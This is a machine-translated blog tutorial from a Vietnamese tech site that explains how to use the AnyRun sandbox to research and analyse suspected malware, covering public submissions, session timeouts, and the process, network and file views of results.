Thứ Sáu, Tháng Tám 19, 2022
  • Home
  • Health
  • News
  • Software
  • Tech
  • Travel
  • Gen Z
NATuts
  • Home
  • Health
  • News
  • Software
  • Tech
  • Travel
  • Gen Z
No Result
View All Result
NATuts
  • Home
  • Health
  • News
  • Software
  • Tech
  • Travel
  • Gen Z
No Result
View All Result
NATuts
No Result
View All Result
Home Thủ thuật Phần mềm

How to use AnyRun for in-depth malware analysis

23 Tháng Bảy, 2021
in Phần mềm
0
How to use AnyRun for in-depth malware analysis
604
SHARES
3.4k
VIEWS
Share on FacebookShare on Twitter

AnyRun is an analysis application in a sandbox environment used to open suspicious files or visit websites and record the activities of applications or websites related to network or system performance. You can also subscribe to unlock even more features, but for your purposes the free version is more than enough. In this article, I will share two different ways that I use this powerful tool.

In short, if you suspect an application is a virus or not , run it on AnyRun , a progress analysis will appear and you will know what components the application affects. Windows.

Các bài viết liên quan:

No Content Available

Research malicious code on AnyRun

The first way to use AnyRun is to research malicious code using the results of other people’s previous research. In the free version, all submissions are public. This makes AnyRun a very valuable tool for Open Source Intelligence (OSINT). We use these public assets to identify malware, extract Indicators of Compromise (IOC) and Behaviors of Compromise (BOC), and to identify threat trends. From the home page, click on the dog-ear- like icon to view the public research results. This list is updated in real time as people submit samples for analysis. Use the filter icon to the right of the search bar to narrow your search.

How to use AnyRun for in-depth malware analysis

For example, if I see a suspicious domain while tracking or searching, I can use the filter above to search for available public studies. Or if you are interested in specific malware like Ursnif , you can find it by filling in its name in the above fields .

Analyze malware with AnyRun

The second way to use AnyRun is analytics. If you cannot find existing studies, you can submit a URL or file for analysis. After you create your free account, click New Task. Basic mode allows you to choose your operating system and then provide a URL or upload a file for analysis. An advanced screen is available if you want to make any adjustments like auto-acknowledge UAC, Anti-evasion, Browser Type and use Fakenet or Tor. The gray option requires you to subscribe to Anyrun.

How to use AnyRun for in-depth malware analysis

Once everything is set up, click Run . You will then be able to view the malware’s execution in real time or visit any URL you provide.

The session will end by displaying the results of the analysis. URLs listed in the browser bar can be saved as reference or shared with others.

It’s important to note that in the free version, all running tasks are public, which means everyone else can see the results. So do not run any malware or visit any websites that you think are targeting your organization or may reveal sensitive information. You also need to be careful of two things: session timeouts and user request actions.

Session timeout

AnyRun by default will only run the virtual machine for 60 seconds. While the analysis is running, you can press Add 60s in the top right box to add 60 seconds. You only have a few time extensions with the free version. This is important because sometimes the download takes a long time or the malware author slows down the attack time to avoid automatic sandbox analysis tools. Another reason you might want more time is because you need to perform user actions.

User request action

Sometimes the malware or website you are trying to analyze will ask you to take some action. Your mouse and keyboard can be used in the virtual machine. For example, an unzipped file might have several files inside, and you’ll need to choose which one to run. Or a credential scam site may ask for your information to proceed. Be aware of these types of actions and be ready to extend the session time if needed.

Analysis results Kết

Regardless of whether you’ve found existing studies or created your own research sample, you’ll have a wealth of information once you’ve done your analysis.

Information

How to use AnyRun for in-depth malware analysis

  • Sample source: environmental conditions under which the file or url is run and threats are detected.
  • IOC to list all relevant captured IOCs.
  • Sample sample download option.
  • Process graph to show parent-child relationships of observed processes. In this screen, you can click on any item to get more information about it.
  • The ATT&CK matrix displays the techniques observed in the sample.

Process

How to use AnyRun for in-depth malware analysis

  • The related processes are listed by the full command line as parent processes and nested child processes. The icons displayed in the process ID show behaviors such as network information, executables launched, etc.
  • Clicking on any of these brings up the details window at the bottom with additional information, warnings, and hazards.
  • The “More Info” advanced details screen shows the full command line, as well as the system-level actions of this process, such as modified files, registry changes, network traffic, and more. For example: clicking on the PowerShell process and then clicking “More Info” will bring up the Base64 encoded command.

Network

How to use AnyRun for in-depth malware analysis

  • HTTP Requests will show HTTP results, calling process, full URL, document type, and more. Clicking on one of the items displays the information, Exchangeable Image File (EXIF), Hex data, as well as a link to download the resulting data.
  • Connections shows connection by protocol, calling process, Domain/IP/ASN information, port and traffic. Clicking on one of the entries will show a Hex dump of the packet data in the network session. Here we can see things like HTTP request and response headers as well as payload data.
  • The DNS request shows the query and response.
  • Threats will have alerts triggered from a Suricata IDS instance with associated alert details.
  • The PCAP icon on the far right allows you to download a packet capture of the sample.

Files

How to use AnyRun for in-depth malware analysis

  • Modify files shows the process, full path, and filename and file type of any file created or modified.
  • Clicking on any of these will bring up the details of the file including its hash, MIME, asset preview, and even the option to download a copy.

Conclude

I use this tool daily for threat analysis and research to help build a community of threat search and ever-changing threat awareness. Finally, AnyRun has a pretty intuitive interface and I hope I’ve covered all of its extremely useful features to encourage you to give it a try.

Tags: anyrunvirusworm
Previous Post

How to backup SMS and restore on Android

Next Post

10 reasons you should use Brave instead of Chrome

Admin Natuts

Admin Natuts

Related Posts

Instructions to convert Word files into PDF files for teachers

Instructions to convert Word files into PDF files for teachers

21 Tháng Mười, 2021
How to schedule a meeting in Google Meet

How to schedule a meeting in Google Meet

15 Tháng Mười, 2021
Black Tool – The best Tool Hack python

Black Tool – The best Tool Hack python

25 Tháng Bảy, 2021
How to sign up for DuckDuckGo’s @duck.com Secure Mail

How to sign up for DuckDuckGo’s @duck.com Secure Mail

23 Tháng Bảy, 2021
10 reasons you should use Brave instead of Chrome

10 reasons you should use Brave instead of Chrome

23 Tháng Bảy, 2021
How to Create Videos with Artificial Intelligence with Synthesia

How to Create Videos with Artificial Intelligence with Synthesia

23 Tháng Bảy, 2021
Load More
Next Post
10 reasons you should use Brave instead of Chrome

10 reasons you should use Brave instead of Chrome

Trả lời Hủy

Email của bạn sẽ không được hiển thị công khai. Các trường bắt buộc được đánh dấu *

Bài viết mới

Download PDF-XChange 9 – Detailed installation instructions
Software

Download PDF-XChange 9 – Detailed installation instructions

18 Tháng Tám, 2022
Phuong Nam Ha Long Restaurant where to discover the best sea cuisine
Travel

Phuong Nam Ha Long Restaurant where to discover the best sea cuisine

18 Tháng Tám, 2022
Russia’s challenge to Crimea’s ‘Mecca’
News

Russia’s challenge to Crimea’s ‘Mecca’

18 Tháng Tám, 2022
Do I need to install other anti-virus software when I have Windows Defender?
Tech

Do I need to install other anti-virus software when I have Windows Defender?

18 Tháng Tám, 2022
Command Shutdown, Restart with CMD
Tech

Command Shutdown, Restart with CMD

18 Tháng Tám, 2022
The origin of the song “I left you in a rainy afternoon” is going viral throughout Tiktok 2022?
Gen Z

The origin of the song “I left you in a rainy afternoon” is going viral throughout Tiktok 2022?

18 Tháng Tám, 2022
W3Schools

Ads

Contact: [email protected]

DMCA.com Protection Status

Categories

  • Android
  • Cạm bẫy tâm lí
  • Chưa được phân loại
  • Đồ họa
  • Đời sống
  • Gen Z
  • Health
  • iOS
  • Kĩ năng mềm
  • News
  • Nhà mạng
  • Phần mềm
  • Phần mềm đồ họa
  • Review sách
  • Software
  • Tech
  • Thiết kế ảnh
  • Thiết kế video
  • Thủ thuật
  • Travel
  • Văn hóa Nam Bộ
  • Văn học
  • Window

Browse by Tag

adobe premier pro android Apple browser Bullet Journal bản thân chai pin chỉnh sửa video Chỉnh ảnh data file âm thanh fshare giả lập màu giảm cân học bổng ios karaoke khuyến mãi kiến thức messenger miễn phí Máy ảnh nghệ thuật ngoại ngữ nhà Trần phỏng vấn pin laptop quảng cáo spleetergui tiếng anh trạng thái Trần Thủ Độ tách beat tách giọng tạo giọng điện thoại tắt cập nhật tắt hoạt động từ vựng viettel window 10 word xh-1 zalo Đơn giản đại học

Recent News

Download PDF-XChange 9 – Detailed installation instructions

Download PDF-XChange 9 – Detailed installation instructions

18 Tháng Tám, 2022
Phuong Nam Ha Long Restaurant where to discover the best sea cuisine

Phuong Nam Ha Long Restaurant where to discover the best sea cuisine

18 Tháng Tám, 2022

Trang tin nóng hổi - vừa thổi vừa xem

No Result
View All Result
  • Home
  • Health
  • News
  • Software
  • Tech
  • Travel
  • Gen Z

Trang tin nóng hổi - vừa thổi vừa xem